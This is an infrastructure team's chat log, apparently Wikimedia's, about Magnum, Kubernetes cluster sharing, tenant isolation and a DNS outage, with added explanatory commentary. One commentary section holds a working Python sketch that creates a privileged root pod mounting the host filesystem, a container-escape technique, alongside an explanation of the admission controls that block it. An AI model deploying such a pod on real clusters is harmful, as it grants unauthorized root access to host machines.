[09:48:54] if you haven't spotted this already, releng managed to get gitlab runners working in magnum, with tofu provisioning! T403125
[09:48:55] T403125: Investigate WMCS Magnum for GitLab runners - https://phabricator.wikimedia.org/T403125
[10:15:48] I'm still not a fan of expanding Magnum usage with its current reliability
[10:18:24] * volans was asking dh.inus about it in private :D
[10:20:08] I think it's exciting to see that they managed to set it up, I'm also unsure whether it's going to cause us too many maintenance headaches
[10:22:32] digitalocean usage seems quite limited judging by https://grafana.cloud.releng.team/dashboards
[10:23:29] the bigger question is if non-k8s gitlab runners currently on wmcs should be moved to magnum or not
[10:38:57] the even bigger question is: what is the recommended path if you need a new k8s cluster at WMF? and should it be managed by the tools-infra team?
[10:41:47] 'at WMF' is a rather ambiguous term, I guess intentionally :D
[10:43:15] * volans hides in the bushes, homer's style
[10:49:42] taavi: yes I was aiming for the million-dollar question :D
[12:14:23] dhinus: the unconference session was dropped from the SRE summit so we didn't really get to discuss that. We did have a brief poster session about k8s-as-a-service and I got the standard pushback of 'one cluster per service is bad, we should just have one giant cluster' which works for me but only if people are actually allowed to deploy on the one giant cluster...
[12:46:15] tbh I think I'm crystallizing on one central question, which is whether we trust the isolation between deployments and workloads on a shared k8s cluster. If someone wants to talk me through that or link me to a book to read or something that'd be great because I keep flipping back and forth :(
[12:47:36] define 'we' and 'workloads'
[12:49:02] :D
[12:49:16] So, I'm interested in the answer for all variations of that.
[12:49:58] So, for instance, maybe a shared cluster is a good approach for prod because the deployers are presumed non-malicious, but a shared cluster is a bad approach for volunteers because they are not presumed non-malicious?
[12:50:28] If that's true, then there's still a place in the world for per-cluster isolation, just not necessarily in prod. (for example)
[12:53:12] so obviously if you give two people full root access to a cluster, those two people can do anything with each other's workloads
[12:53:53] sure
[12:54:30] but you don't need root access to deploy a helm chart
[12:55:12] so to share a cluster, you need to restrict what people can do within the cluster. and with those restrictions, there will now be things that people might want to run in those clusters but can't because of those restrictions
[12:55:19] well, depends on the helm chart
[12:56:28] ok
[12:57:02] but, for example, for running pods, is it universally agreed that we /do/ trust the isolation between them?
[12:57:13] or is that controversial?
[12:57:52] again, there is no universal answer
[12:58:05] lol ok
[12:58:06] if you let people run any pods they can imagine, then no
[12:58:29] since you could, like, run a pod as root and mount the host root filesystem in the container, at which point you have root on the host
[12:58:35] sure
[12:59:30] but with something like what we have on toolforge, with only images we manage, per-tool users and other options severely restricted as well, I have much more confidence in that
[13:00:17] So, is the story something like "It is possible to run a secure paas on a single k8s cluster (like toolforge) but the production misc cluster will never be that because people want to deploy things in prod that are fundamentally un-isolatable and that's why we need more than one cluster"?
[13:04:33] I maybe should have started with this question: "Why do we keep deploying new k8s clusters in prod rather than just having one big one per DC and using that as the basic undercloud for everything?"
[13:04:55] I don't know the details about what runs in the production misc cluster but I suspect things run in there (and not in toolforge) because they want to talk to services in the prod network realm
[13:06:04] oh sorry, yes, I understand that the reason for a separate toolforge cluster is network separation.
[13:06:23] But there seem to be quite a few clusters in the prod network space, and more to come.
[13:06:57] When we proposed k8saas at the summit, many people asked the question "why would you need more k8s clusters" and my answer was just "I don't know but it seems like we do"
[13:07:06] (k8saas in prod that is)
[13:07:18] I would rather have a better answer than "I don't know"
[13:09:36] sorry if i'm chasing you in circles taavi
[13:12:08] at least I'm not aware of any plans for even more clusters in that realm.. so I'm not sure where that idea comes from
[13:12:51] If that's true then that's a good answer :)
[13:13:13] (that was what the never-happened unconference session was supposed to be about)
[13:23:42] andrewbogott: imho something to note is that (at least currently) if there is something "weird" running in the wikiprod realm kubernetes clusters that needs to integrate with kubernetes itself, that thing is almost certainly owned by the same SRE team that owns the cluster itself, not something that the development teams building apps that run
[13:23:42] inside the cluster have come up with. but in WMCS, the users building the apps also include a bunch of sre-type people that want to integrate with kubernetes directly or just otherwise don't like the restrictions and opinions that toolforge forces on them.
[13:50:16] taavi: yep, that makes sense.
[14:12:13] I totally understand the case for toolforge as it is. And I'm not being very clear in my questions because I'm thinking about multiple different scenarios at the same time.
[14:14:53] Among those things is the case for magnum. A few times I've suggested that we offer some kind of big shared k8s cluster for users who want to think in terms of (pods and helm) rather than in terms of (toolforge api) and the answer to that (from other wmcs folks) has been "we can't have volunteers share a k8s cluster, each needs their own which is what magnum is for."
[14:15:56] I assume what that really means is that (pods and helm) means a bunch of different things and to provide a /secure/ cluster we would be restricting the (pods and helm) to the point of uselessness
[14:16:20] But then we also have some building consensus that magnum is a waste of time...
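To make the 12:58 "root pod plus hostPath mount" escape concrete, here is a minimal sketch using the official kubernetes Python client. It is illustration only, not anything deployed at WMF: the pod name, image, and namespace are made up, and it assumes a kubeconfig that is allowed to create arbitrary pods on an unrestricted cluster.

```python
# Sketch only: illustrates the "run a pod as root and mount the host root
# filesystem" escape described above. All names here are hypothetical.
from kubernetes import client, config

config.load_kube_config()  # assumes a kubeconfig with permission to create pods

escape_pod = client.V1Pod(
    metadata=client.V1ObjectMeta(name="host-escape-demo"),
    spec=client.V1PodSpec(
        containers=[
            client.V1Container(
                name="shell",
                image="debian:bookworm",
                command=["sleep", "infinity"],
                security_context=client.V1SecurityContext(
                    run_as_user=0,    # root inside the container
                    privileged=True,  # full access to host devices
                ),
                volume_mounts=[
                    client.V1VolumeMount(name="hostroot", mount_path="/host"),
                ],
            )
        ],
        volumes=[
            client.V1Volume(
                name="hostroot",
                # hostPath exposes the worker node's / inside the container;
                # combined with root in the container, this is effectively
                # root on the host.
                host_path=client.V1HostPathVolumeSource(path="/"),
            )
        ],
    ),
)

client.CoreV1Api().create_namespaced_pod(namespace="default", body=escape_pod)
```

This is exactly the kind of pod that restrictions of the sort described later in the conversation (managed images only, restricted capabilities, validating/mutating admission controllers) are meant to refuse; for instance, the upstream "baseline" and "restricted" Pod Security Standards reject both privileged containers and hostPath volumes at admission time.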
[14:16:44] So I guess that means we're telling those users "get a VM and use k3s, you're on your own" which is maybe fine
[14:17:54] a "big shared k8s cluster" is not something that can be discussed without concrete usecases, e.g. why that stuff can't go in toolforge, and why we'd be happy with it in some other cluster but not in toolforge
[14:21:13] Maybe they're deploying something that is already designed around a helm chart and they don't want to refactor it to use our API because that's work?
[14:21:39] again, please can we have actual use cases and not hypotheticals
[14:22:28] imho this is very much connected to the wider "cloud-vps use cases" analysis that cciufo is doing: what workloads do we have? who is responsible for them? what's the "best
[14:22:34] I feel like this shouldn't be a new topic to you. We've often/frequently discussed the fact that the current toolforge design would result in shaking out exceptional cases that aren't right for toolforge and that we'd have to provide fallback options...
[14:22:40] *"best" platform for running them?
[14:22:52] If you think there are no such use cases that's great! But no one has ever suggested that in past discussions
[14:27:08] taavi: you asking for specific cases is perfectly reasonable but I am also frustrated by how many things that I take as conventional wisdom are getting denied this week :)
[14:45:10] what is magnum currently being used for? or is it not actually in use yet?
[14:47:21] I would upgrade cloudcumin2001 to Bookworm tomorrow morning (https://phabricator.wikimedia.org/T403153), unless there are any objections about the time
[14:55:15] moritzm: for sure it will need the cumin hotpatch that is in place there re-added manually. I think it would also be nice to save the cumin/cookbook logs to restore them after the reimage. Dunno what the others think
[15:00:45] I would upgrade these in-place like cumin2002, not reimage
[15:01:08] but not sure which cumin hotpatch you mean? don't these run the stock cumin package?
[15:01:13] ah got it, then I guess just the hotpatch but I can take care of it once upgraded
[15:02:51] ok, sounds good. I'll drop a note here when I start and when I'm done
[15:02:57] sounds good
[15:02:58] thx
[15:09:08] cciufo: it has at least 4 or 5 current users, I'll get you a list after this meeting
[15:17:28] note to my fingers: the paws project bastion is not called pawstion
[15:17:55] lol
[15:49:22] cciufo: https://etherpad.wikimedia.org/p/magnumusersfeb2026
[15:55:04] I always do my best to present data as unpleasantly as possible
[15:56:20] andrewbogott: actually I was thinking it might be worth copy/pasting that to wikitech :P (without the table maybe)
[15:56:51] it's pretty dynamic... I guess ideally it would be an openstack-browser page
[16:02:06] so we just have one volunteer use case
[16:02:11] if I read that correctly
[16:03:13] out of that table, procbot and qlever are not wmf-affiliated
[16:04:49] sorry, 2
[16:05:02] doesn't seem a critical mass ;)
[16:08:01] indeed!
[17:09:35] The beta cluster magnum cluster is a bare POC with no workloads. The zuul cluster right now is also empty of useful work. I think the superset cluster is on the way out, right?
[17:10:15] * taavi has no idea about the status of superset.wmcloud.org
[17:10:26] Not having the k8s worker nodes be Puppet clients makes Magnum less useful for Beta Cluster than some other k8s solution that had ops/puppet integration would be.
[17:11:44] "There was a Phabricator ticket to explore replacing Quarry with Superset's SQL Lab feature, but the ticket was declined." -- https://wikitech.wikimedia.org/wiki/Superset [17:12:34] To me that decision should have meant that we announced a sunset for superset.wmcloud.org. The whole point of the trial was to replace Quarry and that hypothesis failed. [17:12:48] i assume that's referring to https://phabricator.wikimedia.org/T169452 [17:13:05] T169452 [17:13:06] T169452: Replace Quarry with an installation of Superset - https://phabricator.wikimedia.org/T169452 [17:13:09] yeah [17:13:14] * taavi notes some recent activity on https://superset.wmcloud.org/dashboard/list/ [17:13:20] * taavi files yet another task [17:13:35] Oh I'm sure it is getting used. But it is also abandonware [17:16:12] I kind of paused my Magnum adoption work because I thought the backend was swapping out. [17:21:37] The 3 main things I have seen external folks talk about in the one big k8s cluster vs lots of k8s clusters debate are 1) tenant isolation, 2) geo distribution, and 3) maximum cluster size. [17:22:47] T416373 [17:22:48] T416373: Sunset superset.wmcloud.org - https://phabricator.wikimedia.org/T416373 [17:23:15] tenant isolation is both who has control of what is deployed and also workload security (do we trust container isolation) [17:24:45] geo distribution is sort of obvious maybe? Having a k8s cluster span data centers or regions is hard if for no other reason than speed of light. [17:25:18] max cluster size is that there are actually planned design limits on how big you can grow a single cluster -- https://kubernetes.io/docs/setup/best-practices/cluster-large/ [17:26:01] 5,000 nodes is like all of our hardware ever bought in 25 years at once. :) [17:30:40] andrewbogott: any guesses why ns1.openstack.codfw1dev.wikimediacloud.org is serving a REFUSED on TXT _acme-challenge.puppet-enc.cloudinfra-codfw1dev.codfw1dev.wmcloud.org? [17:32:34] I'm not sure, do you know how long it's been like that? [17:33:41] at least since 15 January, the logs I have don't go further than that [17:33:56] that 'tenant isolation' thing is a sore point for me because I keep getting told 'but k8s has that!' when I mention how our datacenter doesn't have tenant isolation. [17:34:22] taavi: it might be a side-effect of the upgrade to Trixie then. I can look but not for an hour or so. [17:34:38] ok, thanks, I'll see if I can fix it in the meantime somehow [17:35:33] It's very likely that I broke it [17:36:03] the last time I saw something like that it had to do with the list of permitted inbound IPs. [17:36:52] it seems like pdns just doesn't know about the zones? [17:37:17] mdns is trying but getting 'zone does not exist' errors back [17:46:35] andrewbogott: k8s RBAC provides some building blocks for tenant isolation, but it very much depends on the threat model if that is enough or if more is needed. Documenting the threat model is a hard starting point for these discussions. [17:48:54] The threat model used to build Toolforge has led us currently to restrict the images allowed, the capabilities allowed to the containers, and add validating and mutating admission controllers on top of a lot of RBAC rules. [17:49:20] with all of that we still have a more open cluster than the wikikube cluster in prod in my opinion [17:50:40] I keep wondering about the image restrictions in that I'm not sure that the original justification of owning the base layer to apply patches is being used effectively in our build system focused present. 
[17:51:42] that may not mean that it is a useless feature though. maybe I'm just not seeing it used, or we are holding that ability in reserve
[17:55:44] seems like pdns needed the dump-and-transfer thing on https://wikitech.wikimedia.org/wiki/Portal:Cloud_VPS/Admin/DNS/Designate#Initial_designate/pdns_node_setup
[18:33:38] taavi: did I only do it on one node and not the other? Because almost nothing works until after that step and other things were working
[18:34:14] that seems possible
[18:34:44] the thing that broke was acme-chief, which specifically checks that both dns servers serve the expected results. resolvers should generally fail over to the other server if one is serving REFUSEDs
[18:36:28] did you do the transfer already or shall I?
[18:42:03] I did
[18:49:08] thx
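For reference, a minimal sketch of the kind of "ask every authoritative server directly" check that tripped over the REFUSED above. This is not acme-chief's actual code: it assumes dnspython is available, and the ns0 hostname is a guess, since only ns1.openstack.codfw1dev.wikimediacloud.org is named in the conversation.

```python
# Sketch, not acme-chief's real implementation: query each authoritative
# server directly for the _acme-challenge TXT record and report its rcode.
# A REFUSED from either server fails the check, even though recursive
# resolvers would normally fail over to the other server.
import dns.message
import dns.query
import dns.rcode
import dns.resolver

RECORD = "_acme-challenge.puppet-enc.cloudinfra-codfw1dev.codfw1dev.wmcloud.org."
NAMESERVERS = [
    "ns0.openstack.codfw1dev.wikimediacloud.org",  # assumed name for the other server
    "ns1.openstack.codfw1dev.wikimediacloud.org",  # the one returning REFUSED above
]

for ns in NAMESERVERS:
    # Resolve the nameserver's hostname, then query it directly over UDP.
    addr = dns.resolver.resolve(ns, "A")[0].to_text()
    response = dns.query.udp(dns.message.make_query(RECORD, "TXT"), addr, timeout=5)
    rcode = dns.rcode.to_text(response.rcode())
    answers = [rr.to_text() for rrset in response.answer for rr in rrset]
    print(f"{ns}: {rcode} {answers}")
    if rcode != "NOERROR":
        print(f"  -> {ns} is not serving the zone; an acme-chief-style check fails here")
```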